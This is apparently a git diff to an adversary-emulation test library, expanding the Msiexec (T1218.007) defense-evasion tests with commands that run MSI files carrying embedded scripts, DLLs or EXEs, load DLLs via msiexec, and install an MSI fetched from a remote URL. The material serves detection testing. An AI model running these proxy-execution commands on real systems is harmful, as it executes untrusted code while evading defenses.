diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 6936a1fc..1d8c5887 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -526,9 +526,17 @@ defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
-defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
-defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
-defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
+defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
+defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
+defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
+defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
+defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
+defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
+defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
+defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
+defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
+defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
+defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5bcd62d6..07265b92 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -353,9 +353,17 @@ defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
-defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
-defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
-defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
+defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
+defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
+defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
+defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
+defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
+defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
+defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
+defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
+defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
+defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
+defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 7d9cddcf..808b13a8 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -812,9 +812,17 @@
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
+ - Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
+ - Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index c9d402d4..e79b7716 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -574,9 +574,17 @@
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
+ - Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
+ - Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
+ - Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
+ - Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
+ - Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
+ - Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 6754d5c2..9e1f458e 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -33879,10 +33879,9 @@ defense-evasion:
source_name: Microsoft AlwaysInstallElevated 2018
identifier: T1218.007
atomic_tests:
- - name: Msiexec.exe - Execute Local MSI file
- auto_generated_guid: '0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8'
- description: 'Execute arbitrary MSI file. Commonly seen in application installation.
- The MSI opens notepad.exe when sucessfully executed.
+ - name: Msiexec.exe - Execute Local MSI file with embedded JScript
+ auto_generated_guid: a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
+ description: 'Executes an MSI containing embedded JScript code using msiexec.exe
'
supported_platforms:
@@ -33891,10 +33890,18 @@ defense-evasion:
msi_payload:
description: MSI file to execute
type: Path
- default: PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
dependency_executor_name: powershell
dependencies:
- - description: 'T1218.msi must exist on disk at specified location (#{msi_payload})
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
@@ -33904,15 +33911,332 @@ defense-evasion:
'
executor:
- command: 'msiexec.exe /q /i "#{msi_payload}"
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute Local MSI file with embedded VBScript
+ auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
+ description: 'Executes an MSI containing embedded VBScript code using msiexec.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute Local MSI file with an embedded DLL
+ auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
+ description: 'Executes an MSI containing an embedded DLL using msiexec.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute Local MSI file with an embedded EXE
+ auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
+ description: 'Executes an MSI containing an embedded EXE using msiexec.exe
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+ action:
+ description: 'Specifies the MSI action to perform: i (install), a (admin),
+ j (advertise). The included MSI is designed to support all three action
+ types.
+
+'
+ type: String
+ default: i
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /q /#{action} "#{msi_payload}"
+
+'
+ name: command_prompt
+ - name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
+ auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
+ description: 'Executes an MSI containing embedded JScript code using the WMI
+ Win32_Product class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
+ auto_generated_guid: cf470d9a-58e7-43e5-b0d2-805dffc05576
+ description: 'Executes an MSI containing embedded VBScript code using the WMI
+ Win32_Product class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
+ auto_generated_guid: 32eb3861-30da-4993-897a-42737152f5f8
+ description: 'Executes an MSI containing an embedded DLL using the WMI Win32_Product
+ class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
+ auto_generated_guid: 55080eb0-49ae-4f55-a440-4167b7974f79
+ description: 'Executes an MSI containing an embedded EXE using the WMI Win32_Product
+ class
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ msi_payload:
+ description: MSI file to execute
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+ action:
+ description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
+ The included MSI is designed to support all three action types.
+
+'
+ type: String
+ default: Install
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The MSI file must exist on disk at specified location (#{msi_payload})
+
+'
+ prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
+ -Arguments @{ PackageLocation = ''#{msi_payload}'' }
+
+'
+ name: powershell
+ - name: Msiexec.exe - Execute the DllRegisterServer function of a DLL
+ auto_generated_guid: 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
+ description: 'Loads a DLL into msiexec.exe and calls its DllRegisterServer function.
+ Note: the DLL included in the "src" folder is only built for 64-bit, so this
+ won''t work on a 32-bit OS.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute that has an implemented DllRegisterServer function
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The DLL must exist on disk at specified location (#{dll_payload})
+
+'
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /y "#{dll_payload}"
+
+'
+ name: command_prompt
+ - name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
+ auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
+ description: 'Loads a DLL into msiexec.exe and calls its DllUnregisterServer
+ function. Note: the DLL included in the "src" folder is only built for 64-bit,
+ so this won''t work on a 32-bit OS.
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dll_payload:
+ description: DLL to execute that has an implemented DllUnregisterServer
+ function
+ type: Path
+ default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The DLL must exist on disk at specified location (#{dll_payload})
+
+'
+ prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+
+'
+ get_prereq_command: 'Write-Host "You must provide your own MSI"
+
+'
+ executor:
+ command: 'msiexec.exe /z "#{dll_payload}"
'
name: command_prompt
- name: Msiexec.exe - Execute Remote MSI file
- auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649
+ auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
- in application installation, commonly seen in malware execution. The MSI opens
- notepad.exe when sucessfully executed.
+ in application installation, commonly seen in malware execution. The MSI executes
+ a built-in JScript payload that launches powershell.exe.
'
supported_platforms:
@@ -33921,39 +34245,10 @@ defense-evasion:
msi_payload:
description: MSI file to execute
type: String
- default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi
executor:
command: 'msiexec.exe /q /i "#{msi_payload}"
-'
- name: command_prompt
- - name: Msiexec.exe - Execute Arbitrary DLL
- auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
- description: |
- Execute arbitrary DLL file stored locally. Commonly seen in application installation.
- Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
- By default, if the src folder is not in place, it will download the 64 bit version.
- supported_platforms:
- - windows
- input_arguments:
- dll_payload:
- description: DLL to execute
- type: Path
- default: PathToAtomicsFolder\T1218.007\src\x64\T1218.dll
- dependency_executor_name: powershell
- dependencies:
- - description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
-
-'
- prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-
-'
- get_prereq_command: |
- New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
- Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
- executor:
- command: 'msiexec.exe /y "#{dll_payload}"
-
'
name: command_prompt
T1564.004:
diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md
index 6af04be4..e5788f42 100644
--- a/atomics/T1218.007/T1218.007.md
+++ b/atomics/T1218.007/T1218.007.md
@@ -6,22 +6,38 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
## Atomic Tests
-- [Atomic Test #1 - Msiexec.exe - Execute Local MSI file](#atomic-test-1---msiexecexe---execute-local-msi-file)
+- [Atomic Test #1 - Msiexec.exe - Execute Local MSI file with embedded JScript](#atomic-test-1---msiexecexe---execute-local-msi-file-with-embedded-jscript)
-- [Atomic Test #2 - Msiexec.exe - Execute Remote MSI file](#atomic-test-2---msiexecexe---execute-remote-msi-file)
+- [Atomic Test #2 - Msiexec.exe - Execute Local MSI file with embedded VBScript](#atomic-test-2---msiexecexe---execute-local-msi-file-with-embedded-vbscript)
-- [Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL](#atomic-test-3---msiexecexe---execute-arbitrary-dll)
+- [Atomic Test #3 - Msiexec.exe - Execute Local MSI file with an embedded DLL](#atomic-test-3---msiexecexe---execute-local-msi-file-with-an-embedded-dll)
+
+- [Atomic Test #4 - Msiexec.exe - Execute Local MSI file with an embedded EXE](#atomic-test-4---msiexecexe---execute-local-msi-file-with-an-embedded-exe)
+
+- [Atomic Test #5 - WMI Win32_Product Class - Execute Local MSI file with embedded JScript](#atomic-test-5---wmi-win32_product-class---execute-local-msi-file-with-embedded-jscript)
+
+- [Atomic Test #6 - WMI Win32_Product Class - Execute Local MSI file with embedded VBScript](#atomic-test-6---wmi-win32_product-class---execute-local-msi-file-with-embedded-vbscript)
+
+- [Atomic Test #7 - WMI Win32_Product Class - Execute Local MSI file with an embedded DLL](#atomic-test-7---wmi-win32_product-class---execute-local-msi-file-with-an-embedded-dll)
+
+- [Atomic Test #8 - WMI Win32_Product Class - Execute Local MSI file with an embedded EXE](#atomic-test-8---wmi-win32_product-class---execute-local-msi-file-with-an-embedded-exe)
+
+- [Atomic Test #9 - Msiexec.exe - Execute the DllRegisterServer function of a DLL](#atomic-test-9---msiexecexe---execute-the-dllregisterserver-function-of-a-dll)
+
+- [Atomic Test #10 - Msiexec.exe - Execute the DllUnregisterServer function of a DLL](#atomic-test-10---msiexecexe---execute-the-dllunregisterserver-function-of-a-dll)
+
+- [Atomic Test #11 - Msiexec.exe - Execute Remote MSI file](#atomic-test-11---msiexecexe---execute-remote-msi-file)
-## Atomic Test #1 - Msiexec.exe - Execute Local MSI file
-Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.
+## Atomic Test #1 - Msiexec.exe - Execute Local MSI file with embedded JScript
+Executes an MSI containing embedded JScript code using msiexec.exe
**Supported Platforms:** Windows
-**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8
+**auto_generated_guid:** a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
@@ -30,21 +46,22 @@ Execute arbitrary MSI file. Commonly seen in application installation. The MSI o
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
#### Attack Commands: Run with `command_prompt`!
```cmd
-msiexec.exe /q /i "#{msi_payload}"
+msiexec.exe /q /#{action} "#{msi_payload}"
```
#### Dependencies: Run with `powershell`!
-##### Description: T1218.msi must exist on disk at specified location (#{msi_payload})
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
@@ -60,13 +77,13 @@ Write-Host "You must provide your own MSI"
-## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file
-Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.
+## Atomic Test #2 - Msiexec.exe - Execute Local MSI file with embedded VBScript
+Executes an MSI containing embedded VBScript code using msiexec.exe
**Supported Platforms:** Windows
-**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649
+**auto_generated_guid:** 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
@@ -75,7 +92,419 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - Msiexec.exe - Execute Local MSI file with an embedded DLL
+Executes an MSI containing an embedded DLL using msiexec.exe
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 628fa796-76c5-44c3-93aa-b9d8214fd568
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Msiexec.exe - Execute Local MSI file with an embedded EXE
+Executes an MSI containing an embedded EXE using msiexec.exe
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ed3fa08a-ca18-4009-973e-03d13014d0e8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
